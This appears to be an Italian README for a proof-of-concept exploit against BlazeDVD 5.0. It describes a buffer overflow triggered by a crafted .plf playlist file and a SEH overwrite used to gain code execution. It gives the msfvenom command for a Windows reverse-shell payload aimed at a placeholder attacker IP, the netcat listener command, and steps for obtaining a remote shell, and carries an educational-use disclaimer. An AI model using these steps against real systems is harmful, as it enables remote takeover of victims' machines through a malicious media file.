
Exploit Proof-of-Concept (PoC) che sfrutta una vulnerabilità di buffer overflow in BlazeDVD versione 5.0 tramite un file di playlist .plf appositamente predisposto. L'exploit utilizza la sovrascrittura SEH (Structured Exception Handler) per ottenere l'esecuzione di codice.
.plfQuesto codice è solo a scopo educativo e di ricerca. Qualsiasi uso improprio di questo codice potrebbe violare leggi locali o internazionali. Non mi assumo alcuna responsabilità per danni causati da un uso improprio.
L'exploit genera un file .plf dannoso che, quando viene aperto in BlazeDVD, provoca un buffer overflow e sovrascrive il SEH (Structured Exception Handler), reindirizzando l'esecuzione verso un payload di reverse shell.
Genera lo Shellcode con msfvenom
Usa msfvenom per creare un payload di reverse shell in formato raw, evitando i caratteri cattivi.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Sostituisci lo shellcode all'interno dello script exploit con l'output di msfvenom.
Avvia Netcat (Listener)
In un altro terminale, mettiti in ascolto sulla porta selezionata 8443:
nc -lvnp 8443
Ottieni la Reverse Shell Se l'operazione riesce, una reverse shell si collegherà al tuo listener.